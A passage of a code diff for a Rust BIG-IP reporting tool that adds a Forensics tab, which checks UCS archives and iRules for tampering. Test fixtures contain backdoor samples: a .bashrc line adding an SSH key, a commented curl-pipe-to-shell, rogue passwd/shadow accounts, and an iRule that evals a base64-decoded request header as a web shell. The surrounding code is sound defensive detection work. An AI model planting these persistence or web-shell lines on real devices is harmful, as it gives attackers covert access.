+        let w = fx(&[file("root/.bashrc", Some("echo KEY >> ~/.ssh/authorized_keys\n"))]);
+        assert_eq!(verdict(&w, "shell-dotfiles"), "warn");
+
+        // A benign dotfile → info; a commented-out curl|sh does NOT trip it.
+        let ok = fx(&[file("home/admin/.bashrc", Some("# curl http://x | sh\nexport EDITOR=vi\n"))]);
+        assert_eq!(verdict(&ok, "shell-dotfiles"), "info");
+    }
+
+    #[test]
+    fn shadow_passwordless_account_flagged() {
+        let f = fx(&[file("etc/shadow", Some("root:$6$abc$def:19000:0:99999:7:::\nbackdoor::19000:0:99999:7:::\n"))]);
+        assert_eq!(verdict(&f, "local-accounts"), "warn");
+        let ev = f["checklist"].as_array().unwrap().iter()
+            .find(|c| c["id"] == "local-accounts").unwrap()["evidence"].as_array().unwrap().clone();
+        assert!(ev.iter().any(|x| x == "backdoor"), "passwordless user listed: {ev:?}");
+        // Its content is still never embedded.
+        assert_eq!(f["files"][0]["content"], J::Null);
     }
 }

--- a/rust/tcl-bigip-report/src/forensics.rs
+++ b/rust/tcl-bigip-report/src/forensics.rs
@@ -134,14 +134,42 @@ fn parse_passwd(content: &str) -> Vec<(String, String, String)> {
         .collect()
 }
 
-/// Build the Forensics model for one device from its file inventory.
+/// iRule command-execution / evaluation tokens that are highly unusual in a
+/// legitimate iRule and are the signal for a web-shell / covert-C2 rule
+/// (T1505.003). Matched as whole words in an HTTP-event rule body.
+fn irule_backdoor_hits(rules: &[J]) -> Vec<String> {
+    // Whole-word `eval`, `exec`, or the `[whereis]`/`[subst]`-on-input shape.
+    let risky = regex::Regex::new(r"(?m)\b(eval|exec)\b").expect("valid regex");
+    let http_evt = regex::Regex::new(r"\bHTTP_(REQUEST|RESPONSE)\b").expect("valid regex");
+    let mut hits = Vec::new();
+    for r in rules {
+        let Some(o) = r.as_object() else { continue };
+        // Skip TMOS defaults (`_sys_*`) — never attacker-authored.
+        if o.get("isDefault").and_then(J::as_bool) == Some(true) {
+            continue;
+        }
+        let body = str_field(o, "body");
+        if body.is_empty() {
+            continue;
+        }
+        if http_evt.is_match(body) && risky.is_match(body) {
+            let name = str_field(o, "fullPath");
+            let name = if name.is_empty() { str_field(o, "name") } else { name };
+            hits.push(name.to_owned());
+        }
+    }
+    hits
+}
+
+/// Build the Forensics model for one device from its file inventory and iRules.
 ///
-/// `files` is the per-device inventory (JSON objects with `path`, `size`,
-/// `sha256`, `isText` and optionally `content`). Returns
-/// `{files: [...], checklist: [...]}`; both empty when the inventory is empty
-/// (e.g. a `bigip.conf`-only source with no archive behind it).
+/// `files` is the per-device UCS inventory (JSON objects with `path`, `size`,
+/// `sha256`, `isText` and optionally `content`); `rules` is the device's iRule
+/// list (from the model), scanned for web-shell patterns. Returns
+/// `{files: [...], checklist: [...]}`; `files` is empty when there's no archive
+/// behind the source (e.g. a bare `bigip.conf`), but the iRule check still runs.
 #[must_use]
-pub fn collect_forensics(files: &[J]) -> J {
+pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
     let mut out_files: Vec<J> = Vec::with_capacity(files.len());
     // Checklist accumulators.
     let mut ak_paths: Vec<String> = Vec::new();
@@ -289,7 +317,29 @@ pub fn collect_forensics(files: &[J]) -> J {
         "evidence": J::Array(vec![]),
     }));
 
-    json!({ "files": out_files, "checklist": checklist })
+    // iRule web-shell / covert C2 — command execution in an HTTP-event rule.
+    let irule_hits = irule_backdoor_hits(rules);
+    checklist.push(json!({
+        "id": "irule-backdoor",
+        "label": "iRule command execution",
+        "attack": "T1505.003",
+        "verdict": if irule_hits.is_empty() { "clear" } else { "warn" },
+        "detail": if irule_hits.is_empty() {
+            "no HTTP-event iRule uses eval/exec".to_string()
+        } else {
+            format!("{} HTTP-event iRule(s) use eval/exec — review for a web shell", irule_hits.len())
+        },
+        "evidence": irule_hits,
+    }));
+
+    // Count the actionable findings so the report can surface the tab even for
+    // a config-only source (no files) that still tripped the iRule scan.
+    let flagged = checklist
+        .iter()
+        .filter(|c| matches!(c.get("verdict").and_then(J::as_str), Some("alert" | "warn")))
+        .count();
+
+    json!({ "files": out_files, "checklist": checklist, "flagged": flagged })
 }
 
 #[cfg(test)]
@@ -307,6 +357,11 @@ mod tests {
         })
     }
 
+    /// `collect_forensics` with no iRules (the common file-only test shape).
+    fn fx(files: &[J]) -> J {
+        collect_forensics(files, &[])
+    }
+
     fn verdict<'a>(f: &'a J, id: &str) -> &'a str {
         f["checklist"]
             .as_array()
@@ -320,37 +375,37 @@ mod tests {
 
     #[test]
     fn authorized_keys_flagged_when_non_empty() {
-        let flagged = collect_forensics(&[file(
+        let flagged = fx(&[file(
             "root/.ssh/authorized_keys",
             Some("# comment\nssh-rsa AAAAB3Nz attacker@host\n"),
         )]);
         assert_eq!(verdict(&flagged, "ssh-authorized-keys"), "alert");
 
-        let empty = collect_forensics(&[file("root/.ssh/authorized_keys", Some("# only a comment\n"))]);
+        let empty = fx(&[file("root/.ssh/authorized_keys", Some("# only a comment\n"))]);
         assert_eq!(verdict(&empty, "ssh-authorized-keys"), "clear");
 
-        let absent = collect_forensics(&[file("etc/motd", Some("hi"))]);
+        let absent = fx(&[file("etc/motd", Some("hi"))]);
         assert_eq!(verdict(&absent, "ssh-authorized-keys"), "absent");
     }
 
     #[test]
     fn passwd_added_and_uid0_accounts() {
         // A rogue non-root UID 0 account → alert.
-        let uid0 = collect_forensics(&[file(
+        let uid0 = fx(&[file(
             "etc/passwd",
             Some("root:x:0:0::/root:/bin/bash\nbackdoor:x:0:0::/root:/bin/bash\n"),
         )]);
         assert_eq!(verdict(&uid0, "local-accounts"), "alert");
 
         // An unrecognised interactive account (non-zero uid) → warn.
-        let added = collect_forensics(&[file(
+        let added = fx(&[file(
             "etc/passwd",
             Some("root:x:0:0::/root:/bin/bash\neviluser:x:1200:1200::/home/eviluser:/bin/bash\n"),
         )]);
         assert_eq!(verdict(&added, "local-accounts"), "warn");
 
         // Only stock accounts → clear.
-        let clean = collect_forensics(&[file(
+        let clean = fx(&[file(
             "etc/passwd",
             Some("root:x:0:0::/root:/bin/bash\nnobody:x:99:99::/:/sbin/nologin\n"),
         )]);
@@ -359,7 +414,7 @@ mod tests {
 
     #[test]
     fn sensitive_content_is_not_embedded() {
-        let f = collect_forensics(&[file("etc/shadow", Some("root:$6$abc$def:19000:0:99999:7:::\n"))]);
+        let f = fx(&[file("etc/shadow", Some("root:$6$abc$def:19000:0:99999:7:::\n"))]);
         let shadow = &f["files"][0];
         assert_eq!(shadow["category"], "accounts");
         assert_eq!(shadow["sensitive"], J::Bool(true));
@@ -370,7 +425,7 @@ mod tests {
 
     #[test]
     fn dotfiles_and_logging_surface_as_info() {
-        let f = collect_forensics(&[
+        let f = fx(&[
             file("home/admin/.bashrc", Some("export PATH=$PATH\n")),
             file("etc/syslog-ng/syslog-ng.conf", Some("destination d_remote {};\n")),
         ]);
@@ -384,5 +439,35 @@ mod tests {
             .find(|x| x["path"] == "home/admin/.bashrc")
             .unwrap();
         assert!(bashrc["content"].as_str().unwrap().contains("PATH"));
+    }
+
+    #[test]
+    fn irule_command_execution_flagged() {
+        let rule = |name: &str, body: &str, default: bool| {
+            json!({"name": name, "fullPath": format!("/Common/{name}"), "body": body, "isDefault": default})
+        };
+        // HTTP-event rule using eval → warn, with the rule named as evidence.
+        let bad = collect_forensics(
+            &[],
+            &[rule("shell", "when HTTP_REQUEST { eval [b64decode [HTTP::header X-Cmd]] }", false)],
+        );
+        assert_eq!(verdict(&bad, "irule-backdoor"), "warn");
+        assert_eq!(bad["checklist"].as_array().unwrap().iter()
+            .find(|c| c["id"] == "irule-backdoor").unwrap()["evidence"][0], "/Common/shell");
+
+        // A benign HTTP rule (no eval/exec) → clear.
+        let ok = collect_forensics(
+            &[],
+            &[rule("redirect", "when HTTP_REQUEST { HTTP::redirect https://x/ }", false)],
+        );
+        assert_eq!(verdict(&ok, "irule-backdoor"), "clear");
+
+        // `eval` outside an HTTP event, and a _sys_ default, don't trip it.
+        let non_http = collect_forensics(
+            &[],
+            &[rule("startup", "when RULE_INIT { eval {set x 1} }", false),
+              rule("_sys_https_redirect", "when HTTP_REQUEST { eval x }", true)],
+        );
+        assert_eq!(verdict(&non_http, "irule-backdoor"), "clear");
     }
 }

--- a/rust/tcl-bigip-report/src/lib.rs
+++ b/rust/tcl-bigip-report/src/lib.rs
@@ -23,6 +23,7 @@
 )]
 
 mod certs;
+mod forensics;
 mod graph;
 mod jutil;
 mod model;
@@ -33,7 +34,8 @@ mod services;
 
 pub use tcl_lexer::highlight_tcl;
 
-pub use model::{ENGINE_VERSION, collect_model, collect_model_with_certs};
+pub use forensics::collect_forensics;
+pub use model::{ENGINE_VERSION, collect_model, collect_model_with_certs, collect_model_full};
 pub use query::{ReportError, Source};
 pub use render::{RenderOptions, build_report};
 pub use secrets::{collect_secrets, count_encrypted_secrets, decrypt_secrets};

--- a/rust/tcl-bigip-report/src/model.rs
+++ b/rust/tcl-bigip-report/src/model.rs
@@ -1241,9 +1241,13 @@ fn collect_device(
     );
 
     // Forensic file inventory + ATT&CK-mapped checklist (Forensics tab), built
-    // from the UCS members the entry point extracted. Empty when the source is
-    // a bare bigip.conf with no archive behind it.
-    device.insert("forensics".into(), crate::forensics::collect_forensics(files));
+    // from the UCS members the entry point extracted (empty for a bare
+    // bigip.conf) plus a web-shell scan of this device's iRules.
+    let rule_slice = device.get("rules").and_then(J::as_array).cloned().unwrap_or_default();
+    device.insert(
+        "forensics".into(),
+        crate::forensics::collect_forensics(files, &rule_slice),
+    );
 
     // Tag every displayed object with its partition (from the full path) and
     // collect the device's partition set, so the report can filter to a

--- a/rust/tcl-bigip-report/src/model.rs
+++ b/rust/tcl-bigip-report/src/model.rs
@@ -988,7 +988,12 @@ fn order_virtual_profiles(device: &mut Map<String, J>) {
     }
 }
 
-fn collect_device(uri: &str, source: &str, cert_pems: &HashMap<String, String>) -> J {
+fn collect_device(
+    uri: &str,
+    source: &str,
+    cert_pems: &HashMap<String, String>,
+    files: &[J],
+) -> J {
     let sources: Vec<Source> = vec![(uri.to_string(), source.to_string())];
 
     // One reference-graph walk per referable container, up front.
@@ -1235,6 +1240,11 @@ fn collect_device(uri: &str, source: &str, cert_pems: &HashMap<String, String>) 
         J::Array(crate::secrets::collect_secrets(source)),
     );
 
+    // Forensic file inventory + ATT&CK-mapped checklist (Forensics tab), built
+    // from the UCS members the entry point extracted. Empty when the source is
+    // a bare bigip.conf with no archive behind it.
+    device.insert("forensics".into(), crate::forensics::collect_forensics(files));
+
     // Tag every displayed object with its partition (from the full path) and
     // collect the device's partition set, so the report can filter to a
     // partition while always keeping shared /Common objects visible.
@@ -1294,6 +1304,12 @@ fn collect_device(uri: &str, source: &str, cert_pems: &HashMap<String, String>) 
         .and_then(J::as_array)
         .map_or(0, Vec::len);
     counts.insert("secrets".into(), J::from(secret_total));
+    let file_total = device
+        .get("forensics")
+        .and_then(|f| f.get("files"))
+        .and_then(J::as_array)
+        .map_or(0, Vec::len);
+    counts.insert("files".into(), J::from(file_total));
     device.insert("counts".into(), J::Object(counts));
 
     let ins = insights(&device);
@@ -1304,7 +1320,7 @@ fn collect_device(uri: &str, source: &str, cert_pems: &HashMap<String, String>) 
 /// Build the full report model from loaded `(uri, text)` sources.
 #[must_use]
 pub fn collect_model(sources: &[Source], title: &str) -> J {
-    collect_model_with_certs(sources, title, &HashMap::new())
+    collect_model_full(sources, title, &HashMap::new(), &HashMap::new())
 }
 
 /// [`collect_model`] with certificate PEMs recovered from the UCS filestore.
@@ -1324,10 +1340,38 @@ pub fn collect_model_with_certs(
     title: &str,
     cert_pems: &HashMap<String, HashMap<String, String>>,
 ) -> J {
-    let empty = HashMap::new();
+    collect_model_full(sources, title, cert_pems, &HashMap::new())
+}
+
+/// [`collect_model_with_certs`] plus the per-device UCS **file inventory** that
+/// powers the Forensics tab.
+///
+/// `files` is keyed by source URI → the list of that device's extracted UCS
+/// members (each a JSON object `{path, size, sha256, isText, content?}`, from
+/// [`tcl_bigip_io::list_ucs_members`] / `read_ucs_member` at the wasm/CLI
+/// entry). Both `cert_pems` and `files` are source-scoped so nothing bleeds
+/// between devices in a multi-UCS report. Empty maps reproduce
+/// [`collect_model`] exactly.
+#[must_use]
+#[allow(clippy::implicit_hasher)] // the caller (wasm/CLI) always uses std HashMap
+pub fn collect_model_full(
+    sources: &[Source],
+    title: &str,
+    cert_pems: &HashMap<String, HashMap<String, String>>,
+    files: &HashMap<String, Vec<J>>,
+) -> J {
+    let empty_pems = HashMap::new();
+    let empty_files: Vec<J> = Vec::new();
     let devices: Vec<J> = sources
         .iter()
-        .map(|(uri, src)| collect_device(uri, src, cert_pems.get(uri).unwrap_or(&empty)))
+        .map(|(uri, src)| {
+            collect_device(
+                uri,
+                src,
+                cert_pems.get(uri).unwrap_or(&empty_pems),
+                files.get(uri).map_or(&empty_files, |v| v.as_slice()),
+            )
+        })
         .collect();
 
     let mut totals: Map<String, J> = Map::new();

--- a/rust/tcl-bigip-report/src/model.rs
+++ b/rust/tcl-bigip-report/src/model.rs
@@ -1309,21 +1309,25 @@ pub fn collect_model(sources: &[Source], title: &str) -> J {
 
 /// [`collect_model`] with certificate PEMs recovered from the UCS filestore.
 ///
-/// `cert_pems` maps a `sys file ssl-cert` `cache-path` (as it appears in the
-/// stanza) to the PEM text of that member, read out of the archive by the
-/// caller (the CLI / wasm entry points, which have the raw UCS bytes). The
-/// certs tab parses these to fill metadata-free stanzas and reconstruct the
-/// trust chain; an empty map falls back to config metadata only.
+/// `cert_pems` is keyed **by source URI** and then by a `sys file ssl-cert`
+/// `cache-path` (as it appears in the stanza) → the PEM text of that member,
+/// read out of the archive by the caller (the CLI / wasm entry points, which
+/// have the raw UCS bytes). Scoping by source URI keeps a filestore
+/// `cache-path` shared across two UCS files in one report from resolving to the
+/// wrong device's certificate. The certs tab parses these to fill
+/// metadata-free stanzas and reconstruct the trust chain; an empty map falls
+/// back to config metadata only.
 #[must_use]
 #[allow(clippy::implicit_hasher)] // the caller (wasm/CLI) always uses std HashMap
 pub fn collect_model_with_certs(
     sources: &[Source],
     title: &str,
-    cert_pems: &HashMap<String, String>,
+    cert_pems: &HashMap<String, HashMap<String, String>>,
 ) -> J {
+    let empty = HashMap::new();
     let devices: Vec<J> = sources
         .iter()
-        .map(|(uri, src)| collect_device(uri, src, cert_pems))
+        .map(|(uri, src)| collect_device(uri, src, cert_pems.get(uri).unwrap_or(&empty)))
         .collect();
 
     let mut totals: Map<String, J> = Map::new();

--- a/rust/tcl-bigip-report/src/render.rs
+++ b/rust/tcl-bigip-report/src/render.rs
@@ -54,10 +54,13 @@ pub struct RenderOptions {
     /// Embed the in-browser WASM `f5-query` console. Off yields a smaller page
     /// (e.g. for hosting behind a strict CSP that blocks WebAssembly).
     pub embed_console: bool,
-    /// Certificate PEMs recovered from the UCS filestore, keyed by the
-    /// `sys file ssl-cert` `cache-path`. Lets the certs tab parse metadata-free
-    /// stanzas and reconstruct the trust chain. Empty = config metadata only.
-    pub cert_pems: std::collections::HashMap<String, String>,
+    /// Certificate PEMs recovered from the UCS filestore, keyed **by source
+    /// URI** and then by the `sys file ssl-cert` `cache-path`. Lets the certs
+    /// tab parse metadata-free stanzas and reconstruct the trust chain. The
+    /// outer key scopes PEMs to their device so a shared filestore
+    /// `cache-path` across two UCS files in one report doesn't collide. Empty =
+    /// config metadata only.
+    pub cert_pems: std::collections::HashMap<String, std::collections::HashMap<String, String>>,
 }
 
 impl Default for RenderOptions {

--- a/rust/tcl-bigip-report/src/render.rs
+++ b/rust/tcl-bigip-report/src/render.rs
@@ -15,7 +15,7 @@ use base64::Engine as _;
 use minijinja::{AutoEscape, Environment};
 use serde_json::{Map, Value as J, json};
 
-use crate::model::collect_model_with_certs;
+use crate::model::collect_model_full;
 use crate::query::{ReportError, Source};
 
 // The template we own (adapted from `f5report`'s `report.html.j2` for minijinja
@@ -41,6 +41,8 @@ const CERTS_CSS: &str = include_str!("../templates/certs.css");
 const CERTS_JS: &str = include_str!("../templates/certs.js");
 const SECRETS_CSS: &str = include_str!("../templates/secrets.css");
 const SECRETS_JS: &str = include_str!("../templates/secrets.js");
+const FORENSICS_CSS: &str = include_str!("../templates/forensics.css");
+const FORENSICS_JS: &str = include_str!("../templates/forensics.js");
 const IRULE_FLOW_JS: &str = include_str!("../templates/irule-flow.js");
 
 /// Options controlling report rendering.
@@ -61,6 +63,12 @@ pub struct RenderOptions {
     /// `cache-path` across two UCS files in one report doesn't collide. Empty =
     /// config metadata only.
     pub cert_pems: std::collections::HashMap<String, std::collections::HashMap<String, String>>,
+    /// UCS file inventory for the Forensics tab, keyed **by source URI** → the
+    /// list of that device's extracted members (each a JSON object
+    /// `{path, size, sha256, isText, content?}`, from
+    /// [`tcl_bigip_io::list_ucs_members`] / `read_ucs_member`). Empty = no
+    /// archive behind the source (e.g. a bare `bigip.conf`).
+    pub files: std::collections::HashMap<String, Vec<serde_json::Value>>,
 }
 
 impl Default for RenderOptions {
@@ -70,6 +78,7 @@ impl Default for RenderOptions {
             generated_at: String::new(),
             embed_console: true,
             cert_pems: std::collections::HashMap::new(),
+            files: std::collections::HashMap::new(),
         }
     }
 }
@@ -128,10 +137,12 @@ pub fn render_report(model: J, opts: &RenderOptions) -> Result<String, ReportErr
     ctx.insert("topology_css".into(), J::String(TOPOLOGY_CSS.into()));
     ctx.insert("certs_css".into(), J::String(CERTS_CSS.into()));
     ctx.insert("secrets_css".into(), J::String(SECRETS_CSS.into()));
+    ctx.insert("forensics_css".into(), J::String(FORENSICS_CSS.into()));
     ctx.insert("report_js".into(), J::String(REPORT_JS.into()));
     ctx.insert("topology_js".into(), J::String(TOPOLOGY_JS.into()));
     ctx.insert("certs_js".into(), J::String(CERTS_JS.into()));
     ctx.insert("secrets_js".into(), J::String(SECRETS_JS.into()));
+    ctx.insert("forensics_js".into(), J::String(FORENSICS_JS.into()));
     ctx.insert("irule_flow_js".into(), J::String(IRULE_FLOW_JS.into()));
     ctx.insert("mermaid_js".into(), J::String(MERMAID_JS.into()));
     ctx.insert("topo_types".into(), topo_types());
@@ -167,6 +178,6 @@ pub fn render_report(model: J, opts: &RenderOptions) -> Result<String, ReportErr
 
 /// Collect the model from `sources` and render it to a standalone HTML document.
 pub fn build_report(sources: &[Source], opts: &RenderOptions) -> Result<String, ReportError> {
-    let model = collect_model_with_certs(sources, &opts.title, &opts.cert_pems);
+    let model = collect_model_full(sources, &opts.title, &opts.cert_pems, &opts.files);
     render_report(model, opts)
 }

--- a/rust/tcl-bigip-report/templates/forensics.css
+++ b/rust/tcl-bigip-report/templates/forensics.css
@@ -1,0 +1,41 @@
+/* Forensics tab — UCS file inventory + ATT&CK-mapped hunting checklist. */
+.forensics-view { margin-top: 4px; }
+
+.fx-checklist {
+  display: grid;
+  grid-template-columns: repeat(auto-fit, minmax(260px, 1fr));
+  gap: 10px;
+  margin: 4px 0 18px;
+}
+.fx-check {
+  border: 1px solid var(--line);
+  border-left: 3px solid var(--muted);
+  border-radius: 9px;
+  background: var(--panel);
+  padding: 10px 12px;
+}
+.fx-check-head { display: flex; align-items: center; gap: 8px; flex-wrap: wrap; }
+.fx-verdict {
+  font-size: 10px; text-transform: uppercase; letter-spacing: .04em; font-weight: 700;
+  padding: 1px 6px; border-radius: 5px; background: var(--tag-bg); color: var(--tag-ink);
+}
+.fx-check-label { font-weight: 640; font-size: 13px; }
+.fx-attack { margin-left: auto; font-family: var(--mono); font-size: 10px; color: var(--muted); }
+.fx-check-detail { margin-top: 5px; font-size: 12px; color: var(--muted); }
+
+.fx-red { border-left-color: var(--red); }
+.fx-red .fx-verdict { background: color-mix(in srgb, var(--red) 16%, transparent); color: var(--red); }
+.fx-amber { border-left-color: var(--amber); }
+.fx-amber .fx-verdict { background: color-mix(in srgb, var(--amber) 18%, transparent); color: var(--amber); }
+.fx-blue { border-left-color: var(--blue); }
+.fx-blue .fx-verdict { background: color-mix(in srgb, var(--blue) 16%, transparent); color: var(--blue); }
+.fx-green { border-left-color: var(--green); }
+.fx-green .fx-verdict { background: color-mix(in srgb, var(--green) 16%, transparent); color: var(--green); }
+.fx-muted { opacity: .72; }
+
+.fx-reveal {
+  padding: 3px 10px; border: 1px solid var(--line); border-radius: 7px;
+  background: var(--bg); color: var(--ink); font-size: 12px; cursor: pointer;
+}
+.fx-reveal:hover { border-color: var(--accent); color: var(--accent); }
+.fx-content pre { margin: 0; max-height: 340px; overflow: auto; }

--- a/rust/tcl-bigip-report/templates/forensics.js
+++ b/rust/tcl-bigip-report/templates/forensics.js
@@ -1,0 +1,91 @@
+// f5report — Forensics tab. Renders the UCS file inventory + the ATT&CK-mapped
+// hunting checklist from the embedded model. File contents (non-sensitive text
+// only) sit behind a per-file reveal; shadow / private keys are never embedded.
+// Everything is client-side — nothing left the browser.
+(function () {
+  "use strict";
+  var MODEL = null;
+  try { MODEL = JSON.parse(document.getElementById("f5-model").textContent); }
+  catch (e) { return; }
+  if (!MODEL || !MODEL.devices) return;
+
+  function esc(s) {
+    return String(s == null ? "" : s).replace(/[&<>"]/g, function (c) {
+      return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" }[c];
+    });
+  }
+  function fmtSize(n) {
+    n = +n || 0;
+    if (n < 1024) return n + " B";
+    if (n < 1024 * 1024) return (n / 1024).toFixed(1) + " KB";
+    return (n / (1024 * 1024)).toFixed(1) + " MB";
+  }
+  var VERDICT_TONE = { alert: "red", warn: "amber", info: "blue", clear: "green", absent: "muted" };
+
+  function renderChecklist(checklist) {
+    if (!checklist || !checklist.length) return "";
+    var cards = checklist.map(function (c) {
+      var tone = VERDICT_TONE[c.verdict] || "muted";
+      return '<div class="fx-check fx-' + tone + '">' +
+        '<div class="fx-check-head"><span class="fx-verdict">' + esc(c.verdict) + "</span>" +
+        '<span class="fx-check-label">' + esc(c.label) + "</span>" +
+        '<span class="fx-attack">' + esc(c.attack) + "</span></div>" +
+        '<div class="fx-check-detail">' + esc(c.detail) + "</div></div>";
+    }).join("");
+    return '<div class="fx-checklist">' + cards + "</div>";
+  }
+
+  function renderFiles(files) {
+    if (!files || !files.length) {
+      return '<p class="hint">No forensic files in this source. Generate the report from a ' +
+        "<code>.ucs</code> archive (not a bare <code>bigip.conf</code>) to populate this view.</p>";
+    }
+    var rows = files.map(function (f, i) {
+      var actions;
+      if (f.sensitive) {
+        actions = '<span class="tag amber" title="password hashes / private keys are never embedded in the report">masked — sensitive</span>';
+      } else if (f.content != null) {
+        actions = '<button type="button" class="fx-reveal" data-i="' + i + '">View</button>';
+      } else {
+        actions = '<span class="muted">—</span>';
+      }
+      var sha = esc((f.sha256 || "").slice(0, 16));
+      var main = '<tr class="fx-row" data-cat="' + esc(f.category) + '">' +
+        '<td class="mono strong">' + esc(f.path) + "</td>" +
+        '<td><span class="tag">' + esc(f.category) + "</span></td>" +
+        '<td class="mono small">' + fmtSize(f.size) + "</td>" +
+        '<td class="mono small" title="' + esc(f.sha256) + '">' + sha + "…</td>" +
+        "<td>" + actions + "</td></tr>";
+      var detail = (f.content != null && !f.sensitive)
+        ? '<tr class="fx-content" data-i="' + i + '" hidden><td colspan="5"><pre class="code">' +
+          esc(f.content) + "</pre></td></tr>"
+        : "";
+      return main + detail;
+    }).join("");
+    return '<div class="tablewrap"><table class="grid fx-table"><thead><tr>' +
+      "<th>Path</th><th>Category</th><th>Size</th><th>SHA-256</th><th></th>" +
+      "</tr></thead><tbody>" + rows + "</tbody></table></div>";
+  }
+
+  function wire(view) {
+    view.querySelectorAll(".fx-reveal").forEach(function (btn) {
+      btn.addEventListener("click", function () {
+        var row = view.querySelector('.fx-content[data-i="' + btn.getAttribute("data-i") + '"]');
+        if (!row) return;
+        row.hidden = !row.hidden;
+        btn.textContent = row.hidden ? "View" : "Hide";
+      });
+    });
+  }
+
+  MODEL.devices.forEach(function (d, di) {
+    var deviceEl = document.querySelector('.device[data-dev="' + di + '"]') ||
+      document.querySelectorAll(".device")[di];
+    if (!deviceEl) return;
+    var view = deviceEl.querySelector('.panel[data-panel="forensics"] .forensics-view');
+    if (!view) return;
+    var fx = d.forensics || { files: [], checklist: [] };
+    view.innerHTML = renderChecklist(fx.checklist) + renderFiles(fx.files);
+    wire(view);
+  });
+})();

--- a/rust/tcl-bigip-report/templates/report.html.j2
+++ b/rust/tcl-bigip-report/templates/report.html.j2
@@ -12,6 +12,7 @@
 {{ topology_css | safe }}
 {{ certs_css | safe }}
 {{ secrets_css | safe }}
+{{ forensics_css | safe }}
 </style>
 </head>
 <body>
@@ -103,6 +104,7 @@
     <button class="tab" data-panel="profiles">Profiles <span class="n">{{ d.counts.profiles }}</span></button>
     <button class="tab" data-panel="certificates">SSL Certificates <span class="n">{{ d.counts.certificates }}</span></button>
     {% if d.counts.secrets %}<button class="tab" data-panel="secrets">Secrets <span class="n">{{ d.counts.secrets }}</span></button>{% endif %}
+    {% if d.counts.files %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
@@ -379,6 +381,14 @@
   </div>
   {% endif %}
 
+  {#: ---------------- Forensics (UCS file inventory + hunting checklist) ---------------- :#}
+  {% if d.counts.files %}
+  <div class="panel" data-panel="forensics">
+    <p class="lm-field-note">Forensic inventory of the OS files inside this device's <code>.ucs</code> — the paths an attacker tampers with on a compromised BIG-IP, each with its size and <b>SHA-256</b> (diff it against a known-good host). The checklist runs the <b>UCS forensic checks</b> (see the <b>F5 Sites</b> tab) live against the archive and flags what it finds. File contents are shown only for small non-sensitive text files, behind a per-file reveal; <code>shadow</code> and private keys are <b>never embedded</b> — nothing here left your browser.</p>
+    <div class="forensics-view"></div>
+  </div>
+  {% endif %}
+
   {#: ---------------- Topology ---------------- :#}
   <div class="panel" data-panel="topology">
     <div class="topo-controls">
@@ -644,6 +654,9 @@
 </script>
 <script>
 {{ secrets_js | safe }}
+</script>
+<script>
+{{ forensics_js | safe }}
 </script>
 {% if has_console %}
 <!-- in-browser query engine: wasm-bindgen glue + base64 wasm (the f5-query DSL compiled to WebAssembly) -->

--- a/rust/tcl-bigip-report/templates/report.html.j2
+++ b/rust/tcl-bigip-report/templates/report.html.j2
@@ -106,6 +106,7 @@
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
+    <button class="tab" data-panel="f5sites">F5 Sites</button>
     {% if has_console %}
     <button class="tab" data-panel="console">Query Console</button>
     {% endif %}
@@ -431,6 +432,116 @@
   {#: ---------------- Apps (user-bundled virtual servers) ---------------- :#}
   <div class="panel" data-panel="apps">
     <div class="apps-view"></div>
+  </div>
+
+  {#: ---------------- F5 Sites — community / support / security-IR resources ---------------- :#}
+  <div class="panel" data-panel="f5sites">
+    <p class="lm-field-note">Curated F5 community, support and <b>security-incident-response</b> resources. Because this report is often generated from a <code>.ucs</code> archive of a device under investigation, the <b>UCS forensic checklist</b> below ties each archive path to the attacker behaviour to look for and its <a href="https://attack.mitre.org/" target="_blank" rel="noopener noreferrer">MITRE ATT&amp;CK</a> technique. Every link opens on F5 DevCentral, my.F5 or CISA — nothing here is loaded to render the page or phones home.</p>
+
+    <div class="f5sites-groups">
+      <section class="f5sites-group">
+        <h3>DevCentral &amp; community</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/" target="_blank" rel="noopener noreferrer">DevCentral home</a></li>
+          <li><a href="https://community.f5.com/category/Forums/discussions/TechnicalForum" target="_blank" rel="noopener noreferrer">Technical Forum</a></li>
+          <li><a href="https://community.f5.com/category/articles/kb/technicalarticles" target="_blank" rel="noopener noreferrer">Technical Articles</a></li>
+          <li><a href="https://community.f5.com/category/articles/kb/security-insights" target="_blank" rel="noopener noreferrer">Security Insights (F5 SIRT)</a></li>
+          <li><a href="https://community.f5.com/category/CrowdSRC" target="_blank" rel="noopener noreferrer">CrowdSRC</a></li>
+          <li><a href="https://community.f5.com/category/GroupsCategory" target="_blank" rel="noopener noreferrer">Groups</a></li>
+          <li><a href="https://community.f5.com/category/top/events/Events" target="_blank" rel="noopener noreferrer">Events</a></li>
+          <li><a href="https://community.f5.com/category/top/ideas/Suggestions" target="_blank" rel="noopener noreferrer">Ideas &amp; suggestions</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Support &amp; documentation</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://my.f5.com/manage/s/" target="_blank" rel="noopener noreferrer">MyF5 support portal</a></li>
+          <li><a href="https://techdocs.f5.com/" target="_blank" rel="noopener noreferrer">Product documentation</a></li>
+          <li><a href="https://my.f5.com/manage/s/downloads" target="_blank" rel="noopener noreferrer">Software downloads</a></li>
+          <li><a href="https://www.f5.com/support/security-incident-response-team-sirt" target="_blank" rel="noopener noreferrer">F5 SIRT</a></li>
+          <li><a href="https://www.f5.com/labs" target="_blank" rel="noopener noreferrer">F5 Labs threat intelligence</a></li>
+          <li><a href="https://community.f5.com/t5/technical-articles/how-to-get-a-f5-big-ip-ve-developer-lab-license/ta-p/279858" target="_blank" rel="noopener noreferrer">Get a developer lab license</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group danger">
+        <h3>Compromise &amp; UCS forensics</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/kb/technicalarticles/inspecting-a-ucs-file-from-a-compromised-big-ip/330994" target="_blank" rel="noopener noreferrer">Inspecting a UCS file from a compromised BIG-IP</a></li>
